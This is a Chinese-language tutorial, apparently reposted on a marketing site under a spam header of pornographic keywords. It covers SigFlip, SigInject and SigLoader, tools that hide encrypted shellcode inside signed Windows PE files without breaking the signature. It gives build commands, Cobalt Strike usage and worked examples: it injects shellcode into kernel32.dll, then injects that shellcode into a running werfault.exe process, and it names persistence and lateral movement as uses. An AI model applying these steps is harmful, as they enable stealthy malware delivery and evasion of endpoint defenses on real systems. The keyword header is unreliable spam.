日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
如何使用SigFlip篡改身份認(rèn)證碼簽名的PE文件

關(guān)于SigFlip

SigFlip是一款能夠篡改經(jīng)過身份認(rèn)證碼簽名的PE文件(exe、dll、sys等)的工具,而且整個(gè)過程不會(huì)影響或破壞已有的身份認(rèn)證碼簽名。換句話來說,就是我們可以使用SigFlip向PE文件中嵌入數(shù)據(jù)(比如Shellcode),并且再不會(huì)破壞文件簽名、完整性檢查或PE文件功能的情況下,修改PE文件的校驗(yàn)和或哈希。

SigInject組件可以將Shellcode注入至PE文件的[WIN_CERTIFICATE]證書表中,并輸出加密密鑰以便配合BOF/C/C#加載器(SigLoader)一起使用。SigInject將保存針對PE文件的修改操作,并保證其簽名和證書有效性不變。

SigLoader是一個(gè)基礎(chǔ)加載器,它采用SigInject創(chuàng)建的修改后的PE文件路徑和解密密鑰作為參數(shù),然后提取和解密嵌入的Shellcode,以供選擇Shellcode注入使用。

SigFlip將檢查PE哈希是否已成功更改,然后退出以繞過終端針對此類行為的檢查。

SigFlip可以用于持久化感染、橫向滲透以及命令/代碼執(zhí)行等場景。

注意事項(xiàng):igFlip、SigInject和SigLoader將以BOF腳本和.NET程序集提供。

工具安裝

廣大研究人員可以使用下列命令將該項(xiàng)目源碼克隆至本地:

 
 
      
  
  1. git clone https://github.com/med0x2e/SigFlip.git 
    2.

工具構(gòu)建/編譯

本項(xiàng)目并沒有提供預(yù)編譯的BOF,我們可以使用Mingw-w64來進(jìn)行編譯。如果是.NET,可以使用VS或csc.exe來編譯.NET項(xiàng)目(SigFlip、SigLoader);如果是BOF,請按照下列步驟操作:

 
 
      
  
  1.  i686-w64-mingw32-gcc -c sigflip.c -o sigflip.x86.o 
    2.   
  
  2.  
    3.   
  
  3.  x86_64-w64-mingw32-gcc -c sigflip.c -o sigflip.x64.o 
    4.   
  
  4.  
    5.   
  
  5.  x86_64-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x64.o 
    6.   
  
  6.  
    7.   
  
  7.  i686-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x86.o 
    8.

確保所有的對象文件都存儲(chǔ)在sigflip.cna的相同目錄下,然后在Cobalt Strike中加載sigflip.cna。

注意事項(xiàng):預(yù)編譯的BOF使用的是mingw-64 v8.0.0_3,如果你所使用的mingw-64 >= v9,可能會(huì)出現(xiàn)崩潰的情況。

Cobalt Strike

執(zhí)行程序集:

 
 
      
  
  1. execute-assembly SigFlip.exe -h 
    2.   
  
  2.  
    3.   
  
  3. execute-assembly SigLoader -h 
    4.

BOF:

當(dāng)我們在Cobalt Strike中加載sigflip.cna了之后,將會(huì)注冊兩個(gè)新命令,我們此時(shí)就能夠以下列方式使用SigFlip和SigInject了。

  • SigFlip:在不破壞簽名或證書有效性的情況下,修改PE文件哈希:
    •   
  
         
   
    1. SigFlip "" "
      2.
  • SigInject:向PE文件的[WIN_CERTIFICATE]證書表中注入加密的Shellcode,打印的加密密鑰可以跟基礎(chǔ)C/C#加載器結(jié)合使用以保證簽名和證書的完整性:
    •   
  
         
   
    1. SigInject " " "
      2.
  • SigLoader:從PE文件中加載由SigInject加密的Shellcode,然后使用Early Bird向指定進(jìn)程注入Shellcode,我們可以自定義Shellcode的注入邏輯,或直接替換目標(biāo)代碼:
    •   
  
         
   
    1. SigLoader     
      2.

工具使用樣例

(1) BOF

向msbuild.exe注入隨機(jī)數(shù)據(jù):

 
 
      
  
  1. SigFlip "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" "C:\lolbins\modified-msbuild.exe" 
    2.

向kernel32.ell注入Shellcode:

 
 
      
  
  1. SigInject "C:\Windows\System32\kernel32.dll" "C:\random\modified-kernel32.dll" "C:\shellcode\cobaltstrike_or_msf_shellcode.bin" 
    2.   
  
  2.  
    3.   
  
  3. Sigloader "C:\random\modified-kernel32.dll" "DECRYPTION_KEY" "C:\Windows\System32\werfault.exe" 6300 
    4.

(2) 執(zhí)行程序集

向msbuild.exe注入隨機(jī)數(shù)據(jù):

 
 
      
  
  1. execute-assembly SigFlip.exe -b C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -o C:\Temp\MSBuild.exe 
    2.

向kernel32.ell注入Shellcode:

 
 
      
  
  1. execute-assembly SigFlip.exe -i C:\Windows\System32\kernel32.dll -s C:\Temp\x86shellcode.bin -o C:\Temp\kernel32.dll -e TestSecretKey 
    2.   
  
  2.  
    3.   
  
  3. execute-assembly SigLoader.exe -f C:\Temp\modified-kernel32.dll -e TestSecretKey -pid 2354 
    4.

項(xiàng)目地址

SigFlip:【GitHub傳送門】


分享標(biāo)題:如何使用SigFlip篡改身份認(rèn)證碼簽名的PE文件
瀏覽地址:http://www.dlmjj.cn/article/dphhjeg.html